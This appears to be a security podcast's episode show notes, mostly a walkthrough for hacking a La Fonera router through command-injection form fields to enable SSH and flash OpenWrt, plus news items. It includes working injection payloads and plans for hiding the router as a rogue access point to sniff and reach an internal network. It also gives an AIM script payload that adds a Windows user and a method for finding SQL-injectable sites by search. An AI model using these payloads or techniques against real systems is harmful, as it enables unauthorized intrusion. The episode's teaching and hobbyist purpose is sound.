Episode84

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Episode Media

mp3

Hacking the FON router and hiding it as a rogue

A little about the FON routers

These routers are supplied by LaFonera, and are intended to be used as a WiFi hotspot for the FON network. Add your device, sign up, and use the FON network wherever you go as a member of the FON community. These devices come in two models: the FON (old) and the FON+ (new)

The FON has one ethernet, and wireless. The FON+ has two ethernet ports and wireless (as well as some un-populated USB features!) The FON is tiny, and the FON+ is still small, but much bigger by comparison. Both devices utilize an Atheros wireless chipset. The Atheros wireless chipset is a favorite of wireless enthusiasts due to the relatively open nature and open drivers. This means that all the coolest wireless tools work with Atheros chipsets.

Why hack the FON

Because we can!

No, seriously, we can repurpose this device to do things that it was not intended for, such as many of the projects in out book, Linksys WRT54G Ultimate hacking. Just the other day - on hackaday no less - I came across a ack for turning a FON into a streaming mp3 player...but to our aims, we can hack one for wireless testing, possibly a jump point for testing tools, or even placing the tools on your device. We'll get to a possible use for an attacker soon.

Hacking the FON

Keep in mind in this section we will be dealing with the older FON (not the FON+). At this time, there are no released hacks to add third party firmware on the FON+ (but stay tuned). Some of this stuff will be at a high level, but the detailed steps were graciously created by one of our podcast listeners (and updated by even more): The detailed instructions can be found here: http://www.mcgrewsecurity.com/blog/?p=28

So here are our steps:

  • Power on our FON, not connected to the internet, and associate to the default wireless of "Myplace" using the device serial number as a WPA key.
  • Once connected we need to verify the version of software on the FON. This is displayed on the main web interface screen - this method only works on 0.7.1-r1 of the FON firmware. There are ways to revert versions.
  • Once we have determined the version, we need to send some special form input to the /cgi-bin/webif/connection.sh script on the device, that apparently does not properly sanitize input, and will run the appropriate input as system command. We need to submit two items via the form, so create two local pages the we can open with our browser (no web server needed!). Here is the first, that sets the iptables rules to allow SSH to the device:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

...and the second that starts the SSH Dropbear Service:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
  • Now we should be able to log into the device with SSH. Once we have, we'll want to make sure that we enable SSH to start up after a reboot:
# mv /etc/init.d/dropbear /etc/init.d/S50dropbear

We also need to un-comment the two lines in /etc/firewall.user that we can continue to connect to SSH port 22

  • In order to be able to load our own custom Firmware, OpenWrt Kamikaze, we need to add a custom kernel and RedBoot config to the device. RedBoot is the "BIOS", much like the CFE on Linksys devices. Unlike Linksys devices, RedBoot does not enable networking during boot by default. In order to replace the kernel and RedBoot config, we need to get the files on the device, and then write them on a *nix host connected to the FON:
$ scp openwrt-ar531x-2.4-vmlinuz-CAMCIA.lzma admin@192.168.10.1:/tmp/openwrt-ar531x-2.4-vmlinuz-CAMCIA.lzma

Then we can write the kernel and reboot:

# mtd -e vmlinux.bin.l7 write /tmp/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
# reboot

And now, the new Redboot config:

$ scp out.hex admin@192.168.10.1:/tmp/out.hex
# mtd -e "RedBoot config" write /tmp/out.hex "RedBoot config"
# reboot
  • Now that we have enabled networking in RedBoot, it will listen on port 9000 for about 10 seconds after booting. In those 10 seconds we need to telnet to the port and issue a CTRL-C, which will give us a RedBoot prompt.
  • Loading the new image requires two files (openwrt-atheros-2.6-vmlinux.lzma and openwrt-atheros-2.6-root.jffs2-64k, both available form the OpenWrt website to be placed in the root of a webserver on the attached computer, so that RedBoot can download them.
  • First we need to define some networking for our RedBoot installation
RedBoot> ip_address -l 192.168.1.254/24 -h 192.168.1.5

Then, we can format the flash, download and write the files from the web server:

RedBoot> fis init
RedBoot> load -r -v -b 0x80040450 /openwrt-atheros-2.6-root.jffs2-64k -m HTTP

RedBoot> fis create -b 0x80040450 -f 0xA8030000 -l 0x006F0000 -e 0x00000000 rootfs
RedBoot> load -r -v -b %{FREEMEMLO} /openwrt-atheros-2.6-vmlinux.lzma -m HTTP
RedBoot> fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
RedBoot> fis load -l vmlinux.bin.l7
RedBoot> exec
  • The last exec command should cause the FON to reboot, after which we will have a standard installation of OpenWrt.

Why the hack?

This past August at DEFCON 15 I gave a presentation at The WiFi village on some creative places to hide Rogue Access points, specifically looking at the FON devices because of their small size - making them hide-able in all sorts of places.

I'm continuing to update that presentation with additional places to hide those APs. The latest attempt has been in a single gang electrical box equipped with a 3COM 3CNJ200 Switch-in-a-wall-Jack. This model is a 4 port 10/100 switch, with a single uplink port, there are older versions that are hubs. I picked mine up on eBay for about $3. This neat piece of hardware also has the ability to host two other ports, directly to a cable.

The 3COM switch can either be powered by a 48V power brick, or via power over ethernet - I can use "parasitic power" from either method of delivery

I can attach the ethernet port of the FON, to one of the wired ports on the front of the switch, and then use a patch cable to one of the ports in the switch. However this may look a little suspicious, and the intent is to remain hidden.

Enter the soldering iron! I can remove the ethernet connector from the FON, and directly attach a CAT-5 cable directly to the board, and attach the opposite end to on the back side of the board keeping all of the cabling internal. Sure, this will effectively disable one of the ports in the switch, but the benefits certainly outweigh that. Now for all of you old school networking guys, here is a chance to win a starbucks gift card: What is one of the two accepted minimum lengths of UTP cable between devices. There are two possibilities here, because no on can seem to agree on which is valuable. Either way, both values could cause a problem with this installation...

Now with my hidden AP, I can use OpenWrt to sniff wireless, sniff network traffic (using arp poisoning/spoofing), or set up a cron job to enable the wireless with a configuration that I specify at, say, 2AM, where I can connect and have access directly to your internal network on a device I control.

HACKER TRIVIA: What is dropbear?

Stories For Discussion

"Message Theft" Vulnerability in Gmail - [PaulDotCom] - How timely! It has been reported that Gmail has a CSRF vulnerability. Sweet! Successful execution means that an attacker can create mail filters, and do things like forward all messages to an attackers email account.

HACKER TRIVIA: Does SSL protect you from this exploit?

Banner CSRF Vulnerabilities - [PaulDotCom] - While we are on the topic, I wanted to mention that the Banner vulnerabilities are now public. Yes, there was a reason that we were covering it on the show, so if you are a university, you need to pay attention to this one. The "workaround" is just that, a something an attacker can work around given enough time.

HACKER TRIVIA: Name one way in which you can defeat the referral checking?

Core Releases Several Vulnerabilities for AOL's AIM client - [PaulDotCom] - There are several attack vectors that allow for things such as CSRF via the AIM client (Without the use of a browser), injecting Javascript, attacking the IE engine by sending attacks via AIM. All sorts of fun! Some scary things, it appears that some/most of the vulnerabilities are [not patched http://www.securityfocus.com/brief/596?ref=rss] as researchers warned AOL that the beta versions do not fix the problem because they rely on blocking tags, rather than addresing the problem directly. JUST IN: A real patch is supposed to be released mid-October. Also, if you are doing HTML filtering anywhere, it will not get picked up on because these attacks are traveling over the IM protocol. So, here is an example attack:

<img src="javascript:var oShell = new ActiveXObject('Shell.Application');oShell.ShellExecute('cmd.exe', '/c pause');">

This is a pen testers/attackers dream come true! All you need to do is send an IM to the client, get them to render that code, and you can execute arbitrary commands! (Even better: 'net user youarepwned mysecretpassword /add')

HACKER TRIVIA: What does the "/c" command line option do when passed to "cmd.exe"?

Secure RFID? - [Larry] - One of the challenges with properly securing RFID is the lack of a true randomness. With an RFID chip, the area for actual "code" is quite small, which also makes it difficult to include a random number generator. These Researchers form the University of Massachusetts have found a way to utilize the memory properties of the chip at power up to determine randomness - by binary state due to latent electrical charges. Due to the manufacturing process, there is enough randomness in the the way the latent charges propagate. There is even some possibility that this method can also be used to provide another unique identifier for each chip - effectively defeating cloned chips. Sounds like a lot of work to me, for something that should not be used as a single method of authentication, but used as part of a multi-factor authentication scheme.

HACKER TRIVIA: Where is Larry's RFID implant physically located on his body?

Finding SQL Injection is fun and easy - [PaulDotCom] - I like to review the SQL injection vulnerabilities coming out each week and challenge myself to find vulnerable web site. This is a useful task to perform, as the first place I check for vulnerabilities are the sites that I am being paid to protect. This is a good example, a Mexican web application called "Novus" is vulnerable to SQL injection. A quick Google search for "Powered By Novus", and a "'" instead of the appropriate field in the web application, and we can identify the site as vulnerable. I wish this were automated...

HACKER TRIVIA: In SQL code, what does the double dash "--" do?

BONUS: Search for "Powered by ActiveKB" and refer to http://www.milw0rm.com/exploits/4459. "Bob" says he now has many different people's usernames and passwords... If you are using this software, you should patch? maybe? If there is one...

Unisys and IDS oh my! - [Larry] - In a nutshell, Unisys provided an IDS system to DHS. Allegedly, Unisys didn't configure them properly, or not at all, and then tried to cover it up. So, besides the alleged contractual issues, let's discuss what really went wrong. First off, the IDS systems were allegedly configured in a way that would not allow for real time alerting. You need realtime alerting - and to review the alerts in a timely fashion. Response processes need to reviewed, so that events when caught can be responded to appropriately - DHS employees allegedly discounted the attacks when they were discovered.

HACKER TRIVIA: What color is the beard of the instructor for the SANS intrusion detection track? (Hint: He is very sexy and Brazilian)

Metasploit adds payloads for iPhone - [PaulDotCom] - As if you were already Pwned enough, HD Moore and the metasploit team has added 3 new payloads to metasploit for the iPhone! They are working on some exploits for Safari as well, which I am pretty certain will not take them long. One of the payloads makes the iPhone vibrate, phun :)

HACKER TRIVIA: What kind of processor does the iPhone use?

Adobe Reader = Pwned - [Larry] Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!!," wrote Petko Petkov. Ouch! PDFs are every where!, and this does affect Reader version version 8.1 on Windows XP, which to the best of my knowledge, is the latest version. I'll bet that we'll see a ton more of PDF exploits for several reasons: PDFs are everywhere. The specifications for PDF is over 1000 pages (that's a lot of stuff to screw up). So how do we defend? Restrict PDFS via web or e-mail. Use a third party PDF reader. [PaulDotCom] - View a video of the exploit example here on youtube.

HACKER TRIVIA: Name one alternative to Adobe Reader.

Madwifi to use Open Source HAL - [PaulDotCom] - This is a huge win for all of us. HALs are a PITA, they are the point of contact for the operating system to interact with instead of the hardware, and they are proprietary, which means we don't get to see the source code. OpenBSD's openhal has has been ported to Linux, so we can be totally free an open, and included in the Linux kernel! This is more reason to use Atheros-based chipset cards for doing wireless pen testing and security research.

HACKER TRIVIA: What is the name of the new version of Madwifi that uses the OpenHAL?

More Remote Command Execution;rm -fr * - [PaulDotCom] - Remote command execution vulnerabilities are fun! Its how we were first able to hack the Linksys WRT54G routers with the so called "ping hack", that allows you to append commands to a dialog box in the web interface. We also used the same kind of vulnerability to hack the La Fonera. These vulnerabilities STILL persist in other products, like this one which exists in an enterprise PBX!

HACKER TRIVIA: When hacking the WRT54G with the ping hack, would you want to turn boot_wait on or off?

Wireless Hacking Tournament in Thailand - [Larry] - Ooooh, this sounds like fun! Josh, where are you? Too bad it is only a few days before Christmas... Either way, I'm wondering if there will be anything new to be disclosed at this contest. I'd bet that's what the "bonus cash prize" is for. It would be interesting to fire off your wireless sniffer during the contest, and see what you can turn up.

HACKER TRIVIA: Who is the author of CoWPatty, the tool used to crack WPA-PSK networks?

Blackberry Attack Surface - [Larry] Symantec has released this fantastic PDF (egads, I know) attack surfaces (or potential vectors). If you have a BES/Blackberry installation in your environment I suggest that you read this and examine the expected remediating recommendations. Some of the recommendations really cripple the blackberry - by disabling Bluetooth, 3rd party apps, and yes, e-mail.

HACKER TRIVIA: Why do people love their Blackberries so much? (Most creative answer wins)

New Oracle password algorithm - [Larry] - Those who don't learn from history are doomed to repeat it. In the new version of Oracle 11g, the updated the password algorithm was analyzed by the Phenolit group. The Phenolit guys seemed to indicate that the new algorithm suffers form the same issues that mS encountered with LANMAN/NTLM hashes being stored together.

HACKER TRIVIA:

Other Stories Of Interest

In ur Labz steelin ur Meth - [Larry] - Trading computer equipment for drugs, and leaving Los Alamos National Laboratory possibly containing classified nuclear information.